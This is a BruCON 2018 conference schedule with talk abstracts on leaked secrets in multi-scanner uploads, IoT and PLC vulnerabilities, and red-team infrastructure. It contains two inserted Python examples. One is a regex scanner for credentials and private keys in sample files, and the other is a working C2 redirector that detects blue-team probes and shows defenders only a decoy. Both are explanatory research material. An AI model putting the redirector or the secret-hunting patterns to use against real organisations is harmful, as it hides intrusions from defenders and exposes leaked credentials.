Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms...


Friday October 5, 2018 13:30 - 17:30
04. Orval Novotel

14:00

Dissecting Of Non-Malicious Artifacts: One IP At A Time
For years and years, anti-malware solutions at many levels of the network have been assisted by online anti-virus aggregation services and online sandboxes to extend their detection capability and identify unknown threats. But this power booster comes with a price tag. Even today, enterprises all over the world are using security solutions that, instead of protecting the data, suspect it of being malicious and share it with online multi-scanners. The result is drastic. What separates a hacker from extracting all that data on a daily basis is a couple of hundred euros a month, a price that is easily recouped if that hacker finds a single person of interest. In just a couple of days, one skilled hacker can build an intelligence platform that could be sold for ten times the money invested.

The data is being leaked daily and the variety is endless. In our research, we dived into these malware-scanning giants and built sophisticated YARA rules to capture non-malicious artifacts and extract from them secrets you never thought could leave their vault. But that's not all.

We will show the audience how we built an intelligence tool that, given an API key, will auto-dissect a full dataset. In our talk we reveal the awful truth about allowing internally installed security products to be romantically involved with online scanners.
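Added example, not the speakers' tool or their YARA rules: the same kind of hunt expressed as Python regexes so it runs without the yara module, applied to constructed artifacts (a .env file, a backup script, an SSH key, a marked document and a harmless PE header) of the sort an endpoint product might forward to a multi-scanner. The AWS access key id is Amazon's documented placeholder; the hostnames, credentials and rule set are invented for the example. Findings are redacted before they are reported, so the hunt itself does not re-leak the secret.

```python
"""Hunt secrets in non-malicious artifacts uploaded to multi-scanners (added example)."""
import re
from typing import Dict, List, Tuple

# Regex stand-ins for the YARA rules described above (assumed rule set, bytes
# patterns so binary and text artifacts are handled alike).
RULES: Dict[str, re.Pattern] = {
    "aws_access_key_id": re.compile(rb"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_pem": re.compile(
        rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "credential_in_url": re.compile(
        rb"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^@\s]+@[^\s/]+", re.I),
    "internal_marking": re.compile(
        rb"\b(?:INTERNAL USE ONLY|CONFIDENTIAL|TLP:(?:AMBER|RED))\b", re.I),
}

# Constructed artifacts standing in for files a security product forwarded
# to an online scanner. None of them is malware; that is the point.
SAMPLES: Dict[str, bytes] = {
    "deploy.env": b"AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_REGION=eu-west-1\n",
    "backup.sh": b"#!/bin/sh\ncurl -s ftp://svc_backup:Winter2018!@files.corp.example/dump.tgz\n",
    "id_rsa": (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
               b"b3BlbnNzaC1rZXktdjEAAAAA\n"
               b"-----END OPENSSH PRIVATE KEY-----\n"),
    "q3-roadmap.txt": b"CONFIDENTIAL - Internal use only\nQ3 targets: ...\n",
    "calc.exe": b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff",
}


def redact(secret: bytes, keep: int = 4) -> str:
    """Keep only the edges of a match so a finding can be triaged without
    the hunting pipeline itself re-leaking the secret."""
    s = secret.decode("utf-8", "replace")
    if len(s) <= 2 * keep:
        return "*" * len(s)
    return s[:keep] + "*" * (len(s) - 2 * keep) + s[-keep:]


def scan(data: bytes) -> List[Tuple[str, str]]:
    """Return (rule_name, redacted_match) for every rule hit in one artifact."""
    return [(rule, redact(m.group(0)))
            for rule, pattern in RULES.items()
            for m in pattern.finditer(data)]


def hunt(samples: Dict[str, bytes]) -> Dict[str, List[Tuple[str, str]]]:
    """Scan a batch and report only the artifacts that leaked something."""
    report = {}
    for name, data in samples.items():
        hits = scan(data)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in hunt(SAMPLES).items():
        for rule, snippet in hits:
            print(f"{name}: {rule}: {snippet}")
```

In a real dataset the input would be every sample the multi-scanner's API returns for a retro-hunt, not an inline dict; the redaction step is the part worth keeping, since an intelligence platform built on this data is only as safe as its own logs.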

Speakers
Dani Goland

Dani Goland is a 23-year-old coding machine. At the age of 20 he founded his own boutique company for innovative software and hardware solutions. While gaining experience in the business field, Dani did not neglect his hands-on capabilities. In just a short while he won two coding...

Ido Naor

Ido Naor is a Senior Security Researcher at GReAT, a team of researchers who've been tasked by Kaspersky Lab to investigate the most prolific APT incidents, ransomware distribution, banking heists and other types of internet hacking monsters. Ido's focusing on threats in the middle...


Friday October 5, 2018 14:00 - 15:00
01. Westvleteren University

15:00

IoT RCE, a Study With Disney
As desktop and server security keeps raising the baseline for successful exploitation, IoT devices are still stuck in the 1990s, despite their ubiquity in every home network. This, coupled with the ability to access them from anywhere, is creating a time-bomb situation in which millions of households are left vulnerable, regardless of any network security posture.

These topics will be examined using the "Circle with Disney" and Foscam devices as case studies. During the vulnerability testing of these devices, over 50 CVEs were discovered; the discussion will focus on the more novel attack techniques seen in the Disney Circle, including:
- SSL certificate attribute validation bypasses
- SSID broadcast injection
- use-between-realloc memory corruption
- cloud routing abuse

Finally, there will be a discussion of IoT devices' use of traditionally offensive tools (ARP poisoning, backdoors and beaconing) for core functionality.

Speakers
Lilith Wyatt

Lilith is a Research Engineer with the Talos Security Intelligence and Research Group at Cisco. She's done open source and closed source research on a variety of products, resulting in CVEs on products from vendors including VMware and Zabbix, and has also done internal research on...


Friday October 5, 2018 15:00 - 16:00
01. Westvleteren University

16:00

Coffee Break
Friday October 5, 2018 16:00 - 16:30
00. Lounge University

16:00

Mat's Beard Shaving
Our fund-raising for CyberSkool has been a success!

Will Mat shave his beard?!

Come and find out!

Friday October 5, 2018 16:00 - 16:30
01. Westvleteren University

16:30

Mirror on the wall: using blue team techniques in red team ops
When performing multi-month, multi-C2-teamserver and multi-scenario red team operations, you are working with an infrastructure that becomes very large very quickly. This makes it harder to keep track of what is happening on it. Coupled with the ever-increasing maturity of blue teams, it makes it more likely that the blue team is somewhere analysing parts of your infra and/or artefacts. In this presentation we'll show you how to use that to your advantage. We'll present different ways to keep track of the blue team's analyses and detections, and to dynamically adjust your infra to fool the blue team.

We will first set the scene by explaining common and lesser-known components of red teaming infrastructures, e.g. dynamic redirectors, domain fronting revisited, decoy websites, HTML smuggling, etc. Secondly, we'll show how to centralize all of your infrastructure's and ops' information in an ELK stack, leaving it open for intelligent querying across the entire infrastructure and operation. This will also help with better feedback to the blue team at the end of the engagement. Lastly, we'll dive into novel ways of detecting a blue team's investigation and give examples of how to react to these actions, for example by creating honeypots for the blue team.
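Added example, not the speakers' code: a minimal dynamic redirector that makes the routing decision the abstract describes. Only requests to the implant's URIs that carry the implant's exact fingerprint are forwarded to the teamserver; anything that hits a C2 URI without that fingerprint (a proxy-log replay, a sandbox, an analyst with curl) is treated as a blue-team probe, its /24 is burned, and from then on that network only ever sees the decoy site, even with a perfectly forged request. The C2 paths, User-Agent, session-cookie shape, the /24 burn policy and the IPv4 sample traffic are all assumptions made for this example; the event dicts are what you would ship to the ELK stack.

```python
"""Dynamic redirector with blue-team probe detection (added example; assumed settings)."""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Assumed operator settings: the implant's URIs, its exact User-Agent and
# the shape of its session cookie. A real implant profile would define these.
C2_PATHS = {"/api/v2/telemetry", "/static/jquery-3.3.1.min.js"}
IMPLANT_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SESSION_RE = re.compile(r"[0-9a-f]{40}")


@dataclass
class Request:
    src_ip: str
    path: str
    user_agent: str
    cookies: Dict[str, str] = field(default_factory=dict)


@dataclass
class Redirector:
    burned: Set[ipaddress.IPv4Network] = field(default_factory=set)
    events: List[dict] = field(default_factory=list)   # one record per decision, for ELK

    def is_implant(self, r: Request) -> bool:
        """Fingerprint check: exact UA plus a well-formed session cookie."""
        return (r.user_agent == IMPLANT_UA
                and SESSION_RE.fullmatch(r.cookies.get("session", "")) is not None)

    def is_burned(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.burned)

    def route(self, r: Request) -> str:
        """Return 'teamserver' or 'decoy' and record why."""
        if self.is_burned(r.src_ip):
            verdict, target = "burned_source", "decoy"
        elif r.path in C2_PATHS and self.is_implant(r):
            verdict, target = "implant", "teamserver"
        elif r.path in C2_PATHS:
            # A C2 URI reached without the implant's fingerprint: somebody is
            # replaying or probing. Burn the /24 (assumed policy) so later
            # probes from that range, however well forged, only see the decoy.
            verdict, target = "blue_team_probe", "decoy"
            self.burned.add(ipaddress.ip_network(f"{r.src_ip}/24", strict=False))
        else:
            verdict, target = "visitor", "decoy"
        self.events.append({"src": r.src_ip, "path": r.path, "ua": r.user_agent,
                            "verdict": verdict, "target": target})
        return target


# Constructed traffic (documentation ranges only): a real implant check-in,
# a casual visitor, an analyst curling the C2 URI from the same network, and
# a forged check-in from that network after it was burned.
TRAFFIC = [
    Request("203.0.113.10", "/api/v2/telemetry", IMPLANT_UA, {"session": "ab" * 20}),
    Request("198.51.100.7", "/", "Mozilla/5.0 (X11; Linux x86_64) Firefox/62.0"),
    Request("198.51.100.7", "/api/v2/telemetry", "curl/7.61.0"),
    Request("198.51.100.99", "/api/v2/telemetry", IMPLANT_UA, {"session": "ab" * 20}),
]


def replay(redirector: Redirector, traffic: List[Request]) -> List[str]:
    """Run a request list through the redirector and return the targets chosen."""
    return [redirector.route(r) for r in traffic]


if __name__ == "__main__":
    rd = Redirector()
    for req, target in zip(TRAFFIC, replay(rd, TRAFFIC)):
        print(f"{req.src_ip:15} {req.path:25} -> {target}")
    for ev in rd.events:
        print(ev)
```

The events list is the piece that feeds the centralised ELK view: a `blue_team_probe` verdict with its source range is exactly the signal that tells the operator which part of the infra has been noticed and needs rotating or turning into a honeypot.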

Speakers
Mark Bergman

Starting to code COBOL85 on the ING mainframes at the age of 16, I swiftly learned several programming languages and querying formats. After aiding in compiling the first TCP/IP stack on the ING test mainframe I decided to dive into WinNT development and before I knew it I was digging...

Marc Smeets

Marc is a senior IT security expert, red teamer and ethical hacker. With 12 years' experience in IT security and 3 years in IT operations he knows how to ‘make’ and ‘break’. In early 2016, he co-founded Outflank, a new company solely focussed on red teaming, complex penetration...


Friday October 5, 2018 16:30 - 17:30
01. Westvleteren University

17:30

Process Control through Counterfeit Comms: using and abusing built-in functionality to own a PLC
Programmable Logic Controllers (PLCs) are devices that factories, office buildings and utilities, among other facilities, use to control the processes running in their environment. These devices were designed to do their job and do it well; however, they were not built to protect against malicious actors. This talk walks through some of the vulnerabilities discovered while investigating a well-known PLC, discussing some of the methodologies used in discovery and showing how stringing together a few seemingly minor vulnerabilities can result in device takeover.

Speakers
Jared Rittle

Jared Rittle is a security researcher with Cisco Talos who spends his time focusing on the discovery, exploitation, and coverage of vulnerabilities in the embedded systems found in Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA), and Internet of...


Friday October 5, 2018 17:30 - 18:30
01. Westvleteren University

18:30

BruCON Closing
Friday October 5, 2018 18:30 - 18:45
01. Westvleteren University